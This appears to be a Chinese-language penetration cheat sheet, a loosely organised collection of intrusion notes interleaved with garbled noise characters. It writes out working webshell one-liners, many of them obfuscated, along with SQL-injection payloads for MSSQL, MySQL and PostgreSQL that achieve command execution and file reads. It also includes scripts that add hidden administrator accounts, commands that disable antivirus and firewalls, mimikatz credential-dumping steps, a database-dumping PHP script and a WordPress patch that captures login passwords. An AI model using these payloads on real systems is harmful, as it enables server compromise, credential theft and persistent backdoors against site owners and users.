SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# D2 H, x/ o  p- W( p
access中导出shell
; i, V" B' B( v8 G; F( e! c% b* w
5 c& ?' |! n! Q8 ]( j" ]中文版本操作系统中针对mysql添加用户完整代码:
* X6 y0 M0 M9 `, y, r. y; o
1 G/ Y0 G6 n: i2 Nuse test;. Q3 V$ G7 z/ O& d" B: K
create table a (cmd text);
0 T3 C# C& H* {insert into a values ("set wshshell=createobject (""wscript.shell"") " );
* s/ m7 N8 q  r% Cinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 N, q3 P# u7 \3 n; y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
- ]% ]. ]! u* Q4 [select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";1 J; \/ J3 t- g( C( B  n8 X- k% G+ s
drop table a;" w" a: F2 I; L$ b2 e
( f% K1 ^& h  G8 |; n. O: n/ g
英文版本:
; r+ o! J2 {2 i- s7 u# T+ w  \8 ^' g6 t. ]4 U5 D6 v6 a( ^( A% I# H
use test;* M8 ~3 {* n6 d
create table a (cmd text);
* H4 n2 ^" e  L* C8 G; Iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
  z* ?% v2 F# _6 k* K* ~; linsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
( s. `8 N7 o* ?insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );) _0 P) ]+ o6 a# R9 ?7 S
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";- S" o  ]) e4 Q: ]8 y, R5 s
drop table a;
8 A* p0 Q1 h: F, \1 q
' L0 z, U: L+ b9 F: R" Tcreate table a (cmd BLOB);
- t6 ~/ M2 H7 p9 S( M& ^insert into a values (CONVERT(木马的16进制代码,CHAR));! K) `. {  A5 w' C- l
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'" _( I0 Z! F* v# I" A" i/ g3 t
drop table a;
. A6 B  e/ Q5 ?! X  r( S) k5 k3 {; D; _+ _  B
记录一下怎么处理变态诺顿
0 C2 C6 b% |8 ^8 W+ Q7 T4 Z3 A) z查看诺顿服务的路径! q* _) \+ `. j, Z& a
sc qc ccSetMgr% G: c8 Z6 S) U# G- t8 @
然后设置权限拒绝访问。做绝一点。。
" O7 M0 l0 `2 n" y7 p9 Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
$ H9 F( k# v& N$ W0 E0 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
: D. |; ]8 l$ g2 w) ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators+ h8 c, [# @0 e3 t- d. C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
+ s4 G' W8 j( p  o1 q+ L- Z3 f0 {( }# W
然后再重启服务器, A- a0 s# j0 l
iisreset /reboot, }+ G+ j, S$ b* k6 M" x
这样就搞定了。。不过完事后。记得恢复权限。。。。
0 g3 X  U0 U! e  }8 g  a% q- pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
* @- Q" i( [& \2 X/ ?2 d1 ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
- I6 T# J" `# G; v# `- O4 [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ X! E: Y/ S2 h# x$ q. lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
- X) j3 a6 l7 K4 g; k' qSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
: O( ~6 \( p( f& K/ a- Q- h, T0 ~8 a2 m2 O$ o$ Q9 U% Y
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
. L% z8 `+ a& x
: i4 x) R) P6 \4 J: wpostgresql注射的一些东西
% q: T) T  ^& h- u# ]- f% \- X如何获得webshell
) p  L  b. h; O  k; O4 }- v3 Chttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - p# w' v, Q9 T6 B
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); . c6 y4 E4 @/ ~* _1 L9 K+ f7 T  t
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
/ M7 }: w1 R* y! k如何读文件  M: ?6 a- v) U/ e' @
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);6 s' m' N) M- `9 x
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
; }7 }" u' ~4 Z+ ahttp://127.0.0.1/postgresql.php?id=1;select * from myfile;! z4 J, R% |' }. p4 b

' d3 `5 h* {. }; G8 w4 @' Gz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。1 ]" s$ u6 k- K  J* d  s: Y2 ]
当然,这些的postgresql的数据库版本必须大于8.X0 @/ E$ a2 C4 n, _' w, U/ K
创建一个system的函数:
" Z  I- l6 ~* |) n9 cCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT# l; H  {8 u3 a0 n# E

4 B8 G* q! v1 `* I创建一个输出表:
. @: J' J( P# \CREATE TABLE stdout(id serial, system_out text)
2 `3 W) ^8 y( U8 V4 c
+ W6 B) Y# [/ g1 Y8 ~& p$ O+ V执行shell,输出到输出表内:
7 e( W6 y: j, T* }) o( wSELECT system('uname -a > /tmp/test')# G# a0 {8 F5 i% j7 j* K/ E7 s3 Z
6 ^6 |9 w1 }% l
copy 输出的内容到表里面;
; H0 Y! S7 U. u, I3 K9 xCOPY stdout(system_out) FROM '/tmp/test'" l# J7 \5 U0 a4 A% L

9 ?) ~0 B) e1 `- c4 I从输出表内读取执行后的回显,判断是否执行成功
! A; W( F& c8 W! o
+ N, _8 u7 B; l$ W. r& ASELECT system_out FROM stdout
  s0 s8 E6 w' n, O% s0 E$ A下面是测试例子
7 T& U" x  s& T0 i# p
, O( D+ z3 _' z% O( H; D: b0 y/ R/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
1 ^; s% z, j$ O" W& A  N) f7 X; b+ U& l; h. j
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
3 g$ v# ?" }- F% q. q9 X. ]' g! kSTRICT --& l1 |# H+ s1 @& a1 L6 ^' n: L, T% q
0 X" T9 S2 g: f0 t/ K0 K
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
' T- @: L' d# P1 p* {) l2 {- H4 K+ X3 L* ?& o, X" i
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --, d. [0 w* f; f, E; g

/ g& b- L& s5 z; \- e/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
" b7 V, g7 ]' D# p& dnet stop sharedaccess    stop the default firewall9 ?" Y) G4 }' K) f- {( S
netsh firewall show      show/config default firewall" q6 s4 B3 z2 P) j6 ~
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall" [0 S: O* ?" o9 T
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
6 d- X, q  o7 Y& l/ H修改3389端口方法(修改后不易被扫出)3 M6 J: O  _+ f. H5 x: w1 d
修改服务器端的端口设置,注册表有2个地方需要修改
1 B2 M' k/ J6 k/ {. J$ M5 E8 y2 z; a6 L4 z, {" Q, \3 h  @" W
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
3 l% x5 F, ~! D. o6 IPortNumber值,默认是3389,修改成所希望的端口,比如6000
: \! ~% a# b+ Y2 Z; e8 U0 d! u" Y
第二个地方:
. q1 f2 W/ t5 m( q3 M[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
0 ?7 W) T" U( j1 t- m4 pPortNumber值,默认是3389,修改成所希望的端口,比如6000
: d7 j6 e; f5 f
" {2 I, J* Z) e" Q5 a$ q6 v$ `4 v现在这样就可以了。重启系统就可以了  A( l! O, C" X3 v7 s
6 t. y2 x" J) d% t. T; ^
查看3389远程登录的脚本& t! F( h1 ]2 w7 P& T
保存为一个bat文件" _) P6 X: U4 k# J+ a2 h! G$ ^$ G; D
date /t >>D:\sec\TSlog\ts.log) c& R, o8 L1 F2 d3 N
time /t >>D:\sec\TSlog\ts.log3 X, P( ~1 B3 W" f9 @
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
2 c$ X0 r5 B, F" B9 f, [+ L0 A; Jstart Explorer2 r8 n. Z. h( Z5 I7 M" Z5 z* x
" ]3 ~) B9 V. w
mstsc的参数:
7 V! N$ ?+ O2 F7 F
+ Z( c0 i8 c8 T& w% x$ ]! L远程桌面连接3 }1 g) g3 y; ^0 U1 t
+ [& G+ D! i+ V- a% V+ l1 m
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
+ [' _3 t! D7 e0 b! T4 h  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?. f/ Q$ c: y3 w$ D  J% O

) D4 Z* `1 X, e+ T<Connection File> -- 指定连接的 .rdp 文件的名称。1 {0 S4 }+ i( u0 {7 y1 G; N- \
- y7 N5 a" u! O
/v:<server[:port]> -- 指定要连接到的终端服务器。8 j: m2 A, a$ o% |& Q3 I

) |) A1 \3 h: R1 m8 e1 J/ b/console -- 连接到服务器的控制台会话。  K3 Y( A' q. E, f7 |7 _8 Q" T: j
9 d# E5 U" v5 A8 N" i' J% l1 W- j. S$ z
/f -- 以全屏模式启动客户端。
. Q. r7 ~! X' K) j$ K; E- b' m& K* F9 d; N/ d7 k( v8 W
/w:<width> --  指定远程桌面屏幕的宽度。
9 c: o. s; y3 t+ y0 E5 E6 ^
( P/ t* l- e9 M9 p4 H7 K/h:<height> -- 指定远程桌面屏幕的高度。
) M# f: N4 q0 I1 P
% b, E6 z+ Q3 a& T; X* D/edit -- 打开指定的 .rdp 文件来编辑。/ G$ K. v, y# x. M+ C7 C6 H
& @- |0 s2 Z: m' e; a
/migrate -- 将客户端连接管理器创建的旧版4 m% e& x3 `$ V3 b9 c1 r' c& L% O( b
连接文件迁移到新的 .rdp 连接文件。" j: O/ q% g% H0 h$ p' O6 I4 j2 t
  A- S- n2 {6 l; ]" S
" K2 Q% f7 j) |
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就* G$ e+ B, o9 O
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
1 i2 x9 f, A1 T7 g" p6 R6 F# u6 ~. Q
命令行下开启3389
* Q7 I$ H; o$ a8 Y2 P/ I2 f7 H9 n/ anet user asp.net aspnet /add! _+ q: X0 x! Z1 V
net localgroup Administrators asp.net /add
1 ]# Y) O. `0 q2 gnet localgroup "Remote Desktop Users" asp.net /add3 A- B$ b. F; _) h$ k. f
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D) z( W' i+ m# ]+ z2 S+ d, v
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
  ]1 r. y1 m' K1 b+ _/ c- r* i' ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
( Z& o$ b8 {4 S9 T, Necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
  }5 y, Q9 A+ S5 c5 f! isc config rasman start= auto
0 }% |1 N( t" ]' Tsc config remoteaccess start= auto
: e# K4 i& H% |: G; ]net start rasman  S. P" c$ P5 b# {
net start remoteaccess
6 S& ?8 _4 J0 f: q. b: }Media
9 u9 ?7 Z- ^1 u1 H) L. v; n6 e7 p<form id="frmUpload" enctype="multipart/form-data"
( v2 ^! \5 v5 N0 M7 zaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>; c) m3 a. I( \9 B
<input type="file" name="NewFile" size="50"><br>
0 |" w  C, d# U  P<input id="btnUpload" type="submit" value="Upload">
* O. V8 J# M( Z& f* n2 }* C7 C$ ^</form>
) b6 F5 |& ^" M' P" a$ c; l/ ~* w+ _7 ~/ H. G( S
control userpasswords2 查看用户的密码5 V- m/ a5 J1 S3 u! d
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 o/ H4 t: L  d5 Q. Y* zSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 }2 n; I9 g0 T$ P# F# m: u& x( X) V# }0 G* I
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:3 Y7 H  Z% w2 r" w4 g  X7 \
测试1:  ]6 h2 G  J5 {+ S- c1 b
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! D9 J! A' Q4 J  l0 t
8 ?. E& F8 `0 F( p测试2:
( K3 T7 P3 ?8 a9 j( Y2 ]8 L  i5 U1 i) L3 P" e! r' g% I& `
create table dirs(paths varchar(100),paths1 varchar(100), id int)
1 o# }; ~8 `: ?% ?1 f) Y6 e! D( m
  K% O: i& w6 r- {- z( x3 c+ Tdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--, x" s1 c. U7 N! L

3 n( Q. @9 i5 P9 y, mSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t19 g) W: ^/ R( {& k* Z) f$ `( K
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
- N) K/ D" v! H$ T: b4 ]可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
8 K& ~1 t* H$ W$ B$ Hnet stop mcafeeframework: T) Z* B; j, S/ v3 K/ {
net stop mcshield3 p2 C" n) {7 c8 Q0 ?2 _
net stop mcafeeengineservice
* W* `0 T% y, Y' I$ ^: E" qnet stop mctaskmanager2 O1 J  |! ~( d5 @# K
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D4 ~, Z1 b5 L; ^) F- o: A, F3 D4 {

1 z) c6 Q, E: U; n  VNCDump.zip (4.76 KB, 下载次数: 1) 5 \* D- Z6 }8 v+ A8 F
密码在线破解http://tools88.com/safe/vnc.php( d6 e' E6 t1 s0 l
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
+ @$ J0 E0 d" S- O5 }  W; V* G8 S& T: Q/ W4 ?& Z$ f9 W+ ?9 z
exec master..xp_cmdshell 'net user'
$ d" q' t* V4 e% jmssql执行命令。
" e6 F4 |; t- U8 h获取mssql的密码hash查询
8 v% V3 m5 e! D8 }select name,password from master.dbo.sysxlogins
; n/ l  |9 y$ _+ \. b: n" s. R* ~& p4 }/ Y- L5 `3 g" r
backup log dbName with NO_LOG;
% d, H* O2 m0 X  {- _backup log dbName with TRUNCATE_ONLY;
" J$ i3 L0 M) L+ X+ aDBCC SHRINKDATABASE(dbName);& g$ g8 D, l! @: k3 G. k
mssql数据库压缩
! x8 _% \( m2 E+ K" r) o- X! O5 f: e. o+ a, o7 Z+ Y
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# Y3 c, x' E. p9 w$ _将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 |) ^8 ?0 `" C+ T+ Z8 b7 i2 J' t

5 h) g! [/ H5 X& j, X" M/ L* cbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'3 g: s. Q, |, E
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
' [3 c0 x4 E3 m  C4 i5 g
' ?6 }6 w9 \% Z- gDiscuz!nt35渗透要点:
. n1 X+ _; l% i6 P, U3 Y(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default* A0 |, o/ T' l& x$ |) W
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>( o. A# |- p4 d8 _5 E9 f& ?1 U* [
(3)保存。' H& [5 G8 o1 M( o( k% I- i
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass- Z. O3 }$ K) y, ^2 O! [% S3 F, L
d:\rar.exe a -r d:\1.rar d:\website\# P2 m  e* D( s7 g; B% h
递归压缩website
- T1 O1 H% n# H! l) x+ R6 c1 m( B注意rar.exe的路径
/ }, K: i$ G( j, X% P7 Y5 C0 n5 K! V' o6 h- C
<?php6 \' u/ ^  G! `7 n7 x% l$ y5 y
( j2 D3 x" d( `# @
$telok   = "0${@eval($_POST[xxoo])}";
5 v* ?! a7 a5 t, ^. L0 x$ |% k
! m0 `/ N$ R: F: P& M4 `$username   = "123456";
9 W- G/ `: U% H7 r/ F6 z# R, D" u2 T  ^
$userpwd   = "123456";
3 `* _* ?  V7 M7 P9 C! ^1 R5 ^7 n; G: q& s
$telhao   = "123456";
" o5 w/ L( |/ `- s# A; p. D8 j( m, y( |# C8 ?3 ^
$telinfo   = "123456";
" B  k3 ~! a/ l+ {0 ]- |9 w2 U1 h, k, z% G7 N3 }8 Y
?>
8 S+ b4 u4 `* C8 {" w2 f" o) Pphp一句话未过滤插入一句话木马
7 Z; J5 r: A/ U7 G5 G- u
  ^  {+ l( s& g2 i# R6 R3 [, Q站库分离脱裤技巧
# y: |, i& t& u& [4 bexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'* P+ U* [& D# c+ V! ?
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
; k1 u9 W& [! j3 @. l+ ^3 U条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& K. w" ^7 q% I8 ~6 P: V
这儿利用的是马儿的专家模式(自己写代码)。# A+ m/ \  A" B
ini_set('display_errors', 1);
  c. G- n5 _6 p  oset_time_limit(0);' x6 T0 z% P" k- q' ]5 c/ U
error_reporting(E_ALL);$ |- a; m/ U% h0 B0 l9 k9 t2 q$ z! v
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
$ t: F8 n) O. A& o, F, p3 Ymysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());* Z2 R7 F1 c, m8 f+ `0 s. M
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
3 t7 H& L) K. Q+ y$i = 0;" K3 R) O5 L: }- h/ B2 D3 T
$tmp = '';
( ]$ A" _; T$ ywhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {5 |/ d  w  f' b4 i& b9 a" x
    $i = $i+1;7 t4 D! Q( ]; H: Z" [; X& s, E
    $tmp .=  implode("::", $row)."\n";
7 G9 g" D: A" |* [    if(!($i%500)){//500条写入一个文件( @8 n1 I/ [' r( t
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';5 D6 ^% g( r0 c1 q
        file_put_contents($filename,$tmp);
9 _3 l: P, Z1 ?% I( b# W        $tmp = '';2 l, u2 I; {: c& F6 g( U
    }
  [" T! e3 \9 z' S+ H}
0 O+ q# W; L. z9 ]mysql_free_result($result);8 [& Y  v. Q/ t$ B! \* T, E
! `. S5 v) B  P7 N5 q
$ o# U- A: P7 _

+ f# S0 W& D$ Y//down完后delete* g. {& M: {8 f& ]8 B( H! J
" e9 Y2 L  B8 J2 S$ M2 h. s

6 B  r& N8 l4 t4 I( G$ ]( Hini_set('display_errors', 1);
" ^0 Y. k" j: f2 z! @7 Z5 xerror_reporting(E_ALL);
* I+ ~0 Q' T  f& z! r2 ^$i = 0;
' `% N7 U1 s# {  {# J1 W  {while($i<32) {0 F& H- r! r, D. y7 z
    $i = $i+1;
* i7 P; J9 }/ E$ u1 X0 ^5 y( ]" ?        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';8 ]$ T. y  u5 ^; r6 f# _2 o
        unlink($filename);
  `5 D" j4 z. I7 g4 k$ ~% @}
* m& y6 W5 m  [$ o6 o6 V9 y* A; }6 Shttprint 收集操作系统指纹
3 ]* X/ x0 T5 P0 Z6 V6 x0 z+ c/ J扫描192.168.1.100的所有端口' w7 G$ g  g, h3 h2 r4 Q  @
nmap –PN –sT –sV –p0-65535 192.168.1.100
2 i7 m6 t1 d+ ?6 ahost -t ns www.owasp.org 识别的名称服务器,获取dns信息& E6 V# x. }! E8 M$ S& H/ @
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输5 B* o( f/ ~* s4 P: l, R
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host" N! v5 ?8 u- G! n1 O% i
" ~2 q0 X! [) I( Q2 V* ]
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. d3 P# a" G2 h; F0 H
2 R) M/ ~7 C2 O- L) @  V  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% J9 y' I5 X* E2 Q7 `) {9 D

5 @6 o0 s, R! h$ b  S# E  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x* [7 P: r& W5 p* |/ q2 t7 [

3 I6 L0 n1 ^, \5 s  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
; ~' @+ h& a- A2 C. |4 a5 {, X% q
! U  K( c4 G( t7 ?0 b1 S  http://net-square.com/msnpawn/index.shtml (要求安装)
: H. d0 D1 x/ U% G( o/ n2 f' l( I( K  t* a, |) K8 b8 x  a
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
, ]+ c1 g; e% }: I7 p
; Q) r# D2 J* W5 m: ]' S/ K! X7 o8 x  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- s' a! N9 v* G7 _% Z+ qset names gb2312
. C1 B' r" f6 L# w" `. H. W3 ~导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。& Q8 p2 u2 h# V' |1 ~% ~0 m+ H
$ X0 {# x# x. O! M8 S
mysql 密码修改
  D9 F- N! @4 aUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” , w" ?  n( B; s& h5 A
update user set password=PASSWORD('antian365.com') where user='root';8 S6 t: F( x, c, H
flush privileges;: Z9 C# |# ]3 ~
高级的PHP一句话木马后门
5 m: P+ @( s+ D2 v, F( ^  ^( c$ y! M" l% K  P: E) B/ E# M! N
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
  W; ~4 Y3 x, `9 T( |# W4 K! H- s9 \
6 Y; I2 |) i6 f" A% L2 \1、
0 x0 x  O! `2 l) `
9 P: A9 X0 r- |1 H$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
& }$ Z5 \+ y4 L4 w5 t
. U8 q9 x. {) {: K+ n- M$hh("/[discuz]/e",$_POST['h'],"Access");
% B8 @( E( }" i  R8 O9 m5 Z
# B" V. u9 d" V7 Q' L2 q//菜刀一句话
5 T$ V1 M9 M) V" F- L) ]' n& R% \0 K5 L+ W2 g- B
2、
# z' C0 M' q* o% f* o9 ?. r( W4 ~- d" ?
3 Q6 \; w( r/ ]% V' Y* A4 y  e5 Z$filename=$_GET['xbid'];- o. w, c/ y3 [% R

# c2 @( d$ ^  U/ O7 ~include ($filename);3 u+ K& I1 X# ]% q! J  P

5 L9 S7 Y& F* Z+ i' |//危险的include函数,直接编译任何文件为php格式运行
  Q- a0 V. B  W, y
, M& }2 P- s5 ]8 V3、) q  _; j# U5 ~$ Z; O+ ?

0 a, N6 Q6 x3 a1 @( v, f! Q$reg="c"."o"."p"."y";
# h5 m4 M3 S9 W) O
' X' E, c( w6 E7 P! X+ O. ]7 O$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);5 U- I4 ]# x5 E* ~: M* d6 m& f

8 y% t. i7 C% @$ z* g//重命名任何文件
( U' R  \* C+ Z: {. N9 N
. f6 b) M3 T. O6 U+ M7 f" |7 @  \+ o4、, L4 e1 k8 r2 _1 X
" v# J: _- Z/ t) F
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  U0 |& O2 ]4 P: o' Q8 w/ F& ~

, i+ E9 e# J3 F& K* J$ [$gzid("/[discuz]/e",$_POST['h'],"Access");" R" v$ k% P+ y, O
2 `. }5 D7 V, m4 W( f/ _" ~
//菜刀一句话
3 b# L3 D, c6 Q7 l$ O/ B
8 H2 O; K8 E$ ~7 N+ [5、include ($uid);8 c$ K0 d( [3 a) D9 ^2 p: C
/ W5 Z; ~6 d. z2 b; b# C2 f
//危险的include函数,直接编译任何文件为php格式运行,POST 0 d0 z1 Y* r( _8 `% C
& B' s: L' u# Y3 ?( a
  T: o: Z& k' H$ G$ {7 X$ `( [
//gif插一句话
7 \6 K! C4 N# p% D8 C* b9 c. l9 D" v
6、典型一句话
( P8 V- t1 q9 ^, C' \( W
$ n5 i, o0 w. ?: i$ P程序后门代码9 K8 g( m  J+ K( s
<?php eval_r($_POST[sb])?>- g" Z- H0 M& ?+ j. L; r) Z. p
程序代码
* R6 p9 ~" D7 I+ a( t& s<?php @eval_r($_POST[sb])?>9 B& m' s6 U4 X: o  l
//容错代码2 B! z. O7 L1 P- {% ~9 w9 j
程序代码( s# W! {. E: l7 c& U" p! a
<?php assert($_POST[sb]);?>9 j% K9 g0 u( E1 W8 C
//使用lanker一句话客户端的专家模式执行相关的php语句1 [# Y; C! G' y  D- X; L  f
程序代码
3 y  |2 O4 Z2 {+ I/ X7 P<?$_POST['sa']($_POST['sb']);?># Q0 s; F* V  c8 p" d
程序代码
5 ?6 a2 e; r+ o# r: d2 i<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6 k7 O$ A  `' ^) X  S程序代码' s/ n( i/ \' Q' T9 n" e- {
<?php
+ g, T) W8 ^! ?( A& e@preg_replace("/[email]/e",$_POST['h'],"error");9 _7 K3 \# |) Q
?>4 w  O8 t: C" s; E
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
3 ]! b. f1 @) r8 K6 T* |( ^程序代码5 `- m; o4 T9 k+ h0 m5 C
<O>h=@eval_r($_POST[c]);</O>. X! O% {1 Z4 R
程序代码
" ?, j9 J2 a2 a/ B<script language="php">@eval_r($_POST[sb])</script>* t/ r8 X  O; r1 A  p& W
//绕过<?限制的一句话: R) ^7 o* y" }# i/ A- O/ p
; V  }1 d+ [! q* H* v/ J( e
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip  |. v7 g% v7 _1 y
详细用法:  W% L; z0 _! c3 V; S
1、到tools目录。psexec \\127.0.0.1 cmd5 b2 p  ]# [. B4 b4 h! l" }5 g
2、执行mimikatz
' [2 I& E( D& D, z* D- u6 j3 }3、执行 privilege::debug
1 z; m2 U9 w4 V5 H4、执行 inject::process lsass.exe sekurlsa.dll) u3 p% H1 X/ ]9 t; f" Y6 A
5、执行@getLogonPasswords
" Z! P) Q9 @$ V) R. _6、widget就是密码
" J) o% Y3 b) D& z2 @$ b( N# k7、exit退出,不要直接关闭否则系统会崩溃。- X! p' ]) H/ d4 v- m' V  F

5 p/ I' j4 J9 hhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
% k. I" N8 E1 N2 c/ X& K/ x5 }1 |* N; O% I
自动查找系统高危补丁6 ^; S: o- {3 O' {) q
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
4 V+ ~& q+ E. W( ]$ k# m* s9 m  q$ f! y2 ]  F9 a# W0 G# \
突破安全狗的一句话aspx后门
  j$ E& \3 ^  r. N$ R<%@ Page Language="C#" ValidateRequest="false" %>* k; W" B  O3 S# A9 B- m
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>8 K; n+ ?/ V6 ~3 [8 p; B
webshell下记录WordPress登陆密码
; ?7 D7 \( D% Swebshell下记录Wordpress登陆密码方便进一步社工
9 C! d  R; i3 P3 D" [在文件wp-login.php中539行处添加:
, K& t4 |" ^  W$ n// log password
. o1 w7 [3 V1 `' t% h$log_user=$_POST['log'];+ d& ?; j( M1 ~5 M( c; j, K4 s
$log_pwd=$_POST['pwd'];
2 a; G+ J$ K6 U) g( p$log_ip=$_SERVER["REMOTE_ADDR"];
